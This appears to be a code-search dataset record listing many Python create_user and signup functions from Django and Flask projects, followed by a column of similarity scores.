self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The Email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The Email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(\"The given email must be set\")\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def signup(cls, username, first_name, last_name, email, password):\n\n hashed_pwd = bcrypt.generate_password_hash(password).decode('UTF-8')\n\n user = User(\n username=username,\n first_name=first_name,\n last_name=last_name,\n email=email,\n password=hashed_pwd,\n )\n\n db.session.add(user)\n return user", "def 
create_user(self, email, password=None, **extra_fields):\n\n if not email:\n raise ValueError('El usuario debe proporcionar un email')\n\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def create_user(self,email,password=None,**extra_fields):\n if not email:\n raise ValueError(\"Please provide an email\")\n user = self.model(email=self.normalize_email(email),**extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password,username, **extra_fields):\r\n if not email:\r\n raise ValueError('The given email must be set')\r\n if not username:\r\n raise ValueError('The given username must be set')\r\n email = self.normalize_email(email)\r\n user = self.model(email=email,username=str.strip(username), **extra_fields)\r\n user.set_password(password)\r\n user.save(using=self._db)", "def _create_user(self, email: str, password: str, **extra_fields) -> 'User':\n if not email:\n raise ValueError(\"The given email must be set.\")\n email = self.normalize_email(email).lower()\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n\n if not email:\n raise ValueError('The given email must be set')\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, email, password, **extra_fields):\n validate_email(email)\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email: str, password: str, **extra):\n try:\n user = self.model(email=self.normalize_email(email),\n **extra)\n user.set_password(password)\n user.save(using=self._db)\n except IntegrityError as Ex:\n raise IntegrityError(\"Duplicate\")\n return user", "def _create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n \traise ValueError('Must provide a valid email address')\n\n now = timezone.now()\n user = self.model(\n email=self.normalize_email(email),\n date_joined=now,\n last_login=now,\n **extra_fields\n ) \n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, username, firstname, lastname, password, **other_fields):\n\n if not email:\n raise ValueError(_('You must provide an email address'))\n\n email = self.normalize_email(email)\n user = self.model(email=email, username=username, firstname=firstname, 
lastname=lastname, **other_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email=None, password=None, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, username=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password, **kwargs):\n if not email:\n raise ValueError('User must have email address')\n if not password:\n raise ValueError('User must have password')\n email = self.normalize_email(email)\n user = self.model(email=email, **kwargs)\n user.set_password(password)\n user.save()\n\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('User must have an email address')\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n\n user.set_password(password) # Ensure password being encrypted\n user.save(using=self._db) # Save objects in django\n\n return user", "def create_user(self, email: str, password: str, **kwargs: str) -> \"User\":\n email = self.normalize_email(email)\n user: \"User\" = self.model(email=email, **kwargs)\n user.set_password(password)\n user.save()\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, username, email, password, **extra_fields):\n if not email:\n raise ValueError('The email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password, username, **extra_fields):\n if not email:\n raise ValueError(_('Email is required.'))\n if not username:\n raise ValueError(_('Username is required.'))\n email = self.normalize_email(email)\n username = username\n user = self.model(email=email, username=username, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n\n email = self.normalize_email(email)\n #username = self.model.normalize_username(username)\n user = self.model( email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Please enter a valid email address')\n\n user = 
self.model(email=email.lower(), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self,email,password,**extra_fields):\n\t\tif not email:\n\t\t\traise ValueError('The given email must be set')\n\n\t\ttry:\n\t\t\twith transaction.atomic():\n\t\t\t\tuser = self.model(email=email,**extra_fields)\n\t\t\t\tuser.set_password(password)\n\t\t\t\tuser.save(using=self._db)\n\t\t\t\treturn user\n\t\texcept:\n\t\t\traise", "def _create_user(self, username, email, password, **extra_fields):\n if not username:\n raise ValueError('Username is required.')\n if not email:\n raise ValueError('Email is required.')\n if not password:\n raise ValueError('Password is required.')\n try:\n with transaction.atomic():\n user = self.model(username=username, email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user\n except:\n raise", "def create_user(self, email, username, first_name, last_name, password):\n\n email = self.normalize_email(email)\n\n user = self.model(\n email=email,\n username=username,\n first_name=first_name,\n last_name=last_name\n )\n\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def create_user(self, email, password=None, **extrac_fields):\n\n if not email:\n raise ValueError(\"User must have email\")\n\n email = self.normalize_email(email)\n\n user = self.model(email=email, **extrac_fields)\n\n user.set_password(password)\n\n user.save(using=self._db)\n\n return user", "def _create_user(self, email, password, first_name, last_name, **extra_fields):\n now = timezone.now()\n email = self.normalize_email(email)\n user = self.model(email=email,\n first_name=first_name,\n last_name=last_name,\n is_active=True,\n last_login=now,\n date_joined=now, **extra_fields)\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n # Rasie an error if the email is empty\n if not email:\n raise ValueError('User must have an email address')\n # Make the email to be lower case for every new user\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, **fields):\n email = fields.pop('email')\n password = fields.get('password1')\n if not email:\n raise ValueError(\"Email address is required\")\n email = self.normalize_email(email)\n user = self.model(email=email, **fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, username, email, password, **other_fields):\n if not username or not email:\n raise ValueError(_('The email and username must be set.'))\n email = self.normalize_email(email)\n\n user = self.model(username=username, email=email, **other_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, name, password):\n\n if not email:\n raise ValueError(\"User must have an email address\")\n email = self.normalize_email(email)\n user = self.model(email=email)\n user.set_password(password)##encripts the password into HASH\n user.save(using=self._db)\n\n return user", "def _create_user(self, first_name, last_name, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n first_name = first_name\n last_name = self.last_name\n user = self.model(first_name, last_name,email=email, **extra_fields)\n 
user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(email, password):\n\n user = User(email=email, password=password)\n \n db.session.add(user)\n db.session.commit()\n\n return user", "def _create_user(self, username, email, password, **extra_fields):\n if not username:\n raise ValueError('The given username must be set')\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n username = self.model.normalize_username(username)\n user = self.model(username=username, email=email, **extra_fields)\n user.password = make_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n\t\tif not email:\n\t\t\traise ValueError(\"Users must have an email address.\")\n\t\tuser = self.model(\n\t\t\temail = self.normalize_email(email)\n\t\t)\n\t\tuser.set_password(password)\n\t\tuser.save(using=self._db)\n\t\treturn user", "def _create_user(self, username, name,\n email, password, **extra_fields):\n if not email:\n raise ValueError('Email field is required')\n email = self.normalize_email(email)\n user = self.model(\n username=username,\n name=name,\n email=email,\n **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, name, email, password):\n new_user = User(name=name, email=email, password=password)\n db.session.add(new_user)\n db.session.commit()", "def Create_user(self, email, name, password):\n\n #validating user inputs\n if not email:\n raise ValueError('Users must have email address')\n \n #normalize email (converting all to lowercase)\n email = self.normalize_email(email)\n #create a new user object\n user = self.model(email= email, name=name)\n\n #setting the password\n user.set_password(password)\n user.save(using = self._db) #using the same model created for the profile\n\n return user", "def register(cls, username, email, password):\n\n hashed_password = bcrypt.generate_password_hash(password).decode(\"UTF-8\")\n user = User(username=username, email=email, password=hashed_password)\n db.session.add(user)\n\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('The Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n extra_fields.setdefault('is_active', True)\n user.save()\n return user", "def _create_user(self, first_name, last_name, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n now = timezone.now()\n email = self.normalize_email(email)\n user = self.model(\n email=email,\n first_name=first_name,\n last_name=last_name,\n is_active=True,\n is_activated=False,\n last_login=now,\n date_joined=now,\n **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users Must Have an email address')\n user = self.model(\n email=self.normalize_email(email),\n )\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password):\n if not email:\n raise ValueError('Users must have an email address')\n if not password:\n raise ValueError('Password is required')\n\n user = self.model(\n email=self.normalize_email(email),\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, first_name, last_name, 
password=None):\n if not email:\n raise ValueError(_('Users must have an email address'))\n\n user = self.model(\n email=self.normalize_email(email),\n first_name=first_name,\n last_name=last_name\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n\n if not email:\n raise ValueError(\"Users must have an email address\")\n\n user = self.model(\n email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(\"The given email must be set\")\n try:\n with transaction.atomic():\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.generate_activation_code()\n user.save(using=self._db)\n return user\n except:\n raise", "def create_user(self, username, email, password=None,commit=True):\n\n\n user = self.model(\n email=self.normalize_email(email),\n username = username\n )\n\n user.set_password(password)\n if commit:\n user.save(using=self._db)\n\n return user", "def create_user(self, email, first_name, last_name=None, password=None):\n if not email:\n raise ValueError('User must have an email-address')\n\n email = self.normalize_email(email)\n user = self.model(email=email, first_name=first_name, last_name=last_name)\n\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, username, email, password, **extra_fields):\n if not username:\n raise ValueError('The given username must be set')\n email = self.normalize_email(email)\n username = self.model.normalize_username(username)\n user = self.model(username=username, email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, username, email, password):\n\t\tnow = datetime.now()\n\t\tif username is None:\n\t\t\traise ValueError('Must include username')\n\t\tif email is None:\n\t\t\traise ValueError('Must include email')\n\t\temail = self.normalize_email(email)\n\t\tuser = self.model(\n\t\t\temail=self.normalize_email(email),\n\t\t\tusername=username,\n\t\t\tdate_joined=now\n\t\t)\n\t\tuser.set_password(password)\n\t\tuser.save(using=self._db)\n\t\treturn user", "def create_user(email='user@example.com', password='testpass123'):\n return get_user_model().objects.create_user(email=email, password=password)", "def _create_user(self, email, name, password, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n\n email = self.normalize_email(email)\n user = self.model(email=email, name=name, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n user.set_permissions(extra_fields.get('role'))\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=self.normalize_email(email),\n )\n user.set_password(password)\n user.save(using=self._db)\n return user", 
"def create_user(self, email, password=None):\n if not email:\n raise ValueError(\"Users must have an email address\")\n\n user = self.model(\n email=self.normalize_email(email),\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=self.normalize_email(email),\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n now = timezone.now()\n if not email:\n raise ValueError('The given email must be set')\n email = CBUserManager.normalize_email(email)\n user = self.model(email=email,\n is_staff=False, is_active=True, is_superuser=False,\n last_login=now, date_joined=now, **extra_fields)\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n now = timezone.now()\n if not email:\n raise ValueError('The given email must be set')\n email = CBUserManager.normalize_email(email)\n user = self.model(email=email,\n is_staff=False, is_active=True, is_superuser=False,\n last_login=now, date_joined=now, **extra_fields)\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(email, password):\n try:\n User(email=email, password=password)\n except IntegrityError:\n print('Error: Duplicate email address')", "def create_user(self, email, first_name, last_name, password=None):\n if not email:\n raise ValueError('User must have an email address')\n\n # normalizing email for standarization\n email = self.normalize_email(email) \n # creating user model that user manager is representing\n user = self.model(email=email, first_name=first_name, last_name=last_name)\n # Encrypting password using method of AbstractBaseUserClass\n user.set_password(password)\n # self._db to save to any database \n user.save(using=self._db)\n\n return user", "def create_user(self, email, name, password=None):\n try:\n email = self.normalize_email(email)\n user = self.model(email=email, name=name)\n user.set_password(password)\n # This saves the password as hash object\n user.save(using=self._db)\n # Since there can be many dbs in our app, the\n # best practice is to save the user in current db.\n return user\n except Exception as e:\n raise", "def create_user(self,email,password=None, **extra_fields):\n\n if not email: \n raise ValueError('Users must have an email address')\n #sets the email field of your user model, this is done on the model itself because there are no functions to change it.\n user = self.model(email=self.normalize_email(email), **extra_fields) \n user.set_password(password)\n user.save(using=self._db) #save using the defualt database in the settings.py file.\n\n return user", "def create_user(self, email, username, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n if not username:\n raise ValueError('Users must have a username')\n \n user = self.model(email = self.normalize_email(email),\n username = username)\n \n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, username, password=None):\n if not email:\n raise ValueError('The given email must be set')\n if not username:\n raise ValueError('The given username must be set')\n \n user = self.model(email=self.normalize_email(email), username=username)\n user.set_password(password)\n 
user.save(using=self._db)\n return user", "def create_user(self, username, email, password=None):\n\n if not username:\n raise ValueError('Users must have an username')\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n username=username,\n email=self.normalize_email(email),\n )\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_a_user(self, username='fry', email='fry@futur.ama', password='Qwerty!234'):\n user = User.objects.create_user(username, email, password)\n user.save()\n return user", "def create(cls, name, username, email, password):\n new_user = cls(name=name,\n username=username,\n email=email\n )\n new_user.password = bcrypt.generate_password_hash(\n password).decode('utf-8')\n\n db.session.add(new_user)\n db.session.commit()\n\n return new_user", "def create_user(self, email=None, name=None, password=None, phone=None):\n # if not email:\n # raise ValueError('Users must have an email address')\n\n user = self.model(\n email=email,\n name=name,\n phone=phone\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_new_user(cls, user_email, user_password, user_phone):\n\n new_user = User(email=user_email, password=user_password, mobile_phone=user_phone)\n\n db.session.add(new_user)\n db.session.commit()\n\n print \"Successfully added new user with the email: %s\" % user_email", "def create_user(self, name, email, password):\n\t\tif not name:\n\t\t\traise ValueError('You forgot to enter a name!')\n\t\tif not email:\n\t\t\traise ValueError('You forgot to enter an email address!')\n\t\tif not password:\n\t\t\traise ValueError('You forgot to enter a password!')\n\t\ttry:\n\t\t\tvalidate_email(email)\n\t\texcept ValidationError:\n\t\t\traise ValueError('The email address entered is invalid.')\n\t\tif User.objects.filter(email=email).count() > 0:\n\t\t\traise ValueError('The email address entered is already registered.')\n\t\tif len(password) < 8:\n\t\t\traise ValueError('The password must be at least 8 characters.')\n\t\t\n\t\tuser = self.model(\n\t\t\tname=name,\n\t\t\temail=self.normalize_email(email),\n\t\t)\n\t\t\n\t\tuser.set_password(password)\n\t\tuser.save(using=self._db)\n\t\treturn user" ]
[ "0.84163386", "0.8407691", "0.8396383", "0.83900774", "0.83900774", "0.83900774", "0.83818454", "0.83800155", "0.83791924", "0.83788806", "0.83781564", "0.83751047", "0.83726776", "0.83633083", "0.83633083", "0.83633083", "0.8347122", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8345504", "0.8334452", "0.83250177", "0.83218974", "0.83186316", "0.831837", "0.83115476", "0.83111054", "0.8309033", "0.8303709", "0.8302135", "0.8295237", "0.8281763", "0.82788795", "0.82738054", "0.82665956", "0.8256439", "0.82458824", "0.82306653", "0.82306653", "0.82306653", "0.82291484", "0.8223603", "0.822344", "0.82220304", "0.8218027", "0.8213622", "0.821293", "0.82121533", "0.8196599", "0.8183104", "0.8181538", "0.81753594", "0.81724024", "0.8167956", "0.8149421", "0.81391144", "0.813376", "0.813038", "0.812851", "0.8127302", "0.81178594", "0.8114436", "0.81122905", "0.81001174", "0.8080533", "0.80795807", "0.80789137", "0.8075503", "0.80712754", "0.8053893", "0.8049194", "0.80441505", "0.80298764", "0.8016008", "0.8014379", "0.80139726", "0.8011292", "0.79918736", "0.7989007", "0.79844564", "0.7980518", "0.7980518", "0.7978378", "0.79774547", "0.797169", "0.7970018", "0.79672307", "0.79640156", "0.79614455", "0.79570544", "0.7954799", "0.79524994", "0.7950434", "0.79418916" ]
0.8360308
17
creates a species identified by taxid and containing an empty dictionary of orthologs
def __init__(self, taxid, species_name = None, lineage=None): self.genes = dict() self.taxid = taxid self.species = species_name self.lineage = lineage
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_taxon():\n if not exists('./data/taxdmp.zip'):\n ftp = FTP('ftp.ncbi.nih.gov')\n ftp.login()\n ftp.cwd('pub/taxonomy')\n ftp.retrbinary('RETR taxdmp.zip', open('./data/taxdmp.zip', 'wb').write)\n ftp.quit\n with ZipFile('./data/taxdmp.zip', 'r') as dumpfile:\n dumpfile.extractall(path='./data/')\n taxon_id = dict()\n data = list()\n name = dict()\n specie = list()\n son = dict()\n greatson = dict()\n parent = dict()\n rank = dict()\n global taxon\n taxon = list()\n with open('./data/names.dmp', 'r') as dumpfile:\n raw = dumpfile.read().split(sep='\\n')\n raw.pop()\n for record in raw:\n add = record.replace('\\t', '').split(sep='|')\n if add[0] not in name or add[2] == 'scientific name':\n name[add[0]] = add[1]\n with open('./data/nodes.dmp', 'r') as dumpfile:\n raw = dumpfile.read().split(sep='\\n')\n raw.pop()\n for record in raw:\n add = record.replace('\\t', '').split(sep='|')\n # 1696063|Sarcocystis corvusi||scientific name|\n taxon_id[add[0]] = add[1]\n rank[add[0]] = add[3]\n if add[2] == 'species':\n specie.append(add[0])\n for specie in specie:\n record = [specie, ]\n while taxon_id[specie] != '1':\n record.append(taxon_id[specie])\n specie = taxon_id[specie]\n # if '33090' in record:\n # record.pop()\n # record.pop()\n data.append(record)\n for data in data:\n for n in range(len(data)):\n if data[n] not in parent:\n parent[data[n]] = data[(n + 1):]\n if n == 0:\n continue\n if data[n] not in son:\n son[data[n]] = {data[n - 1], }\n else:\n son[data[n]].add(data[n - 1])\n if data[n] not in greatson:\n greatson[data[n]] = {data[0], }\n else:\n greatson[data[n]].add(data[0])\n for specie in name.items():\n if specie[0] not in son:\n son[specie[0]] = set()\n if specie[0] not in parent:\n parent[specie[0]] = list()\n if specie[0] not in greatson:\n greatson[specie[0]] = set()\n record = [specie[0], name[specie[0]], rank[specie[0]], son[specie[0]], parent[specie[0]], greatson[specie[0]]]\n taxon.append(record)\n\n con = sqlite3.connect('./data/DB')\n cur = con.cursor()\n cur.execute(\n 'CREATE TABLE IF NOT EXISTS taxon (Id TEXT, Name TEXT, Rank TEXT, Son TEXT, Parent TEXT, GreatSon TEXT);')\n for line in taxon:\n son = ' '.join(line[3])\n parent = ' '.join(line[4])\n greatson = ' '.join(line[5])\n cur.execute('INSERT INTO taxon (Id, Name, Rank, Son, Parent, GreatSon) VALUES (?, ?, ?, ?, ?, ?);',\n (line[0], line[1], line[2], son, parent, greatson))\n con.commit()\n cur.close()\n con.close()\n print('Done.\\n')", "def writeTaxonomies( self ):\n\n self.logger.info( 'writeTaxonomies: START' )\n\n self.logger.info( 'writeTaxonomies: keggreader.getAllOrganisms(): START' )\n\n organisms = self.reader.getAllOrganisms()\n\n self.logger.info( 'writeTaxonomies: keggreader.getAllOrganisms(): DONE' )\n\n taxonomies = {} \n\n taxonomyFile = self.openInsertFile( 'taxonomiesInsert.psql' )\n\n self.logger.info( 'writeTaxonomies: We got ' + str(len(organisms)) + ' organisms and our insert file is taxonomiesInsert.psql' )\n\n\n for organism,taxonomyData in organisms.iteritems():\n for tax in taxonomyData['lineage']:\n\n taxonomies[ tax['name'] ] = { 'name': tax['name'], 'tax_id': tax['tax_id'], 'type': tax['type'] } \n\n\n self.logger.info( 'writeTaxonomies: We got ' + str(len(taxonomies)) + ' taxonomies.' 
)\n\n\n for taxonomy,taxData in taxonomies.iteritems():\n taxonomyInserted = self.writeFile( taxonomyFile, 'taxonomies', [ str(taxData['name']), str(taxData['tax_id']), str(taxData['type']) ] )\n self.taxonomiesInserted[ taxData['name'] ] = taxonomyInserted\n\n self.logger.info( 'writeTaxonomies: DONE' )", "def load_taxdict():\n tax = {}\n with open(\"../../data/taxonomy/tree_taxid.txt\", 'r') as file:\n for line in file:\n current_line = line.split() \n current_taxid = current_line[0]\n current_name = current_line[1]\n tax[current_taxid] = current_name \n\n return tax", "def add_taxonomy(tax_idx, pkl):\n for tax,v in tax_idx.items():\n for genome_id,genome_len in v.items():\n T = '|'.join(list(tax) + ['t__' + genome_id])\n pkl['taxonomy'][T] = ('', int(genome_len))\n return pkl", "def species_table(self):\n if self.hdf5_data is None:\n return None\n species_section = self.hdf5_data.get('/species', None)\n if species_section is None:\n return None\n return dict(\n (id, dict(name=name, radius=radius, D=D))\n for id, name, radius, D in species_section.value)", "def createTaxDict(taxFile):\n taxonomyDict = {}\n with open(taxFile, 'r') as f:\n for line in f:\n split = line.rstrip().split(\"\\t\")\n key = split[0]\n vals = split[1:]\n if \"Sendai virus\" in key:\n #print(key,flush=True)\n vals = [\"genus:Respirovirus\",\"family:Paramyxoviridae\",\"order:Mononegavirales\",\\\n \"class:Monjiviricetes\",\"phylum:Negarnaviricota\",\"resolution:genus\"]\n elif \"Bastrovirus\" in key:\n #print(key,flush=True)\n vals = [\"family:Astroviridae\",\"order:Stellavirales\",\"class:Stelpaviricetes\",\\\n \"phylum:Pisuviricota\",\"resolution:family\"]\n keyDict = {}\n for value in vals:\n splitVal = value.split(\":\")\n keyDict[splitVal[0]] = splitVal[1]\n taxonomyDict[key] = keyDict\n print(len(taxonomyDict))\n return taxonomyDict", "def summary(self,attr='raw'):\n g = {}\n g['gid'] = map(lambda x : x.gid, self.taxonomies)\n g['sp'] = map(lambda x : x.presences.species , self.taxonomies)\n \n g['gns'] = map(lambda x : x.presences.genera , self.taxonomies) \n g['fam'] = map(lambda x : x.presences.families , self.taxonomies)\n g['ord'] = map(lambda x : x.presences.orders , self.taxonomies)\n g['cls'] = map(lambda x : x.presences.classes , self.taxonomies)\n g['phy'] = map(lambda x : x.presences.phyla , self.taxonomies)\n g['kng'] = map(lambda x : x.presences.kingdoms , self.taxonomies)\n #g['all'] = map(lambda x : (x.gid,int(x.presences.species),int(x.genera),int(x.families),int(x.orders),int(x.classes),int(x.phyla),int(x.kingdoms)),self.taxonomies)\n keys = settings.TAXONOMIC_TREE_KEYS\n if attr == 'int':\n for key in keys:\n g[key] = map(lambda p : int(p) ,g[key])\n elif attr == 'str':\n for key in keys:\n g[key] = map(lambda p : str(p) ,g[key]) \n elif attr == 'list':\n for key in keys:\n g[key] = map(lambda p : p.list ,g[key]) \n elif attr == 'mapping':\n for key in keys:\n g[key] = map(lambda p : p.map ,g[key]) \n elif attr == 'raw':\n return g\n else:\n logger.error(\"Wrong attribute selection\")\n return None\n \n return g", "def writeOrganismTaxonomies( self ):\n\n self.logger.info( 'writeOrganismTaxonomies: START' )\n\n organisms = self.reader.getAllOrganisms()\n\n taxonomies = {} \n\n self.logger.info( 'writeOrganismTaxonomies: insert file will be organismTaxonomiesInsert.psql' )\n\n taxonomyFile = self.openInsertFile( 'organismTaxonomiesInsert.psql' )\n\n for organism,taxonomyData in organisms.iteritems():\n for tax in taxonomyData['lineage']:\n\n taxId = self.taxonomiesInserted[ tax['name'] ] \n 
organismId = self.importerOrganism.organismsInserted[ organism ] \n\n self.writeFile( taxonomyFile, 'organism_taxonomies', [ str(organismId), str(taxId) ] )\n\n\n self.logger.info( 'writeOrganismTaxonomies: DONE' )", "def get_full_tax(idx):\n logging.info('Compiling the taxonomy for all genomes...')\n tax_idx = collections.defaultdict(dict)\n for cluster_id,v in idx.items():\n for tax,vv in v.items():\n for genome_id,x in vv.items():\n tax_idx[tax][genome_id] = x['genome_len']\n n_genomes = 0\n for tax,v in tax_idx.items():\n n_genomes += len(v.keys())\n logging.info(' Total number of genomes: {}'.format(n_genomes))\n # return\n return tax_idx", "def make_homologues_mirnas(phylogenetic_tree, mirna_seqs):\n species = [leaf.taxon.label for leaf in phylogenetic_tree.leaf_iter()]\n mirhomologues = pd.DataFrame({sp: {mirid: mirna_seqs[mirid][:21]\n for mirid in mirna_seqs.keys()}\n for sp in species}).transpose()\n return mirhomologues", "def as_dict(self):\n species_dict = dict()\n species_dict['force_field'] = self.force_field\n species_dict['is_ts'] = self.is_ts\n if self.e_elect is not None:\n species_dict['e_elect'] = self.e_elect\n if self.e0 is not None:\n species_dict['e0'] = self.e0\n species_dict['arkane_file'] = self.arkane_file\n if self.yml_path is not None:\n species_dict['yml_path'] = self.yml_path\n if self.is_ts:\n species_dict['ts_methods'] = self.ts_methods\n species_dict['ts_guesses'] = [tsg.as_dict() for tsg in self.ts_guesses]\n species_dict['ts_conf_spawned'] = 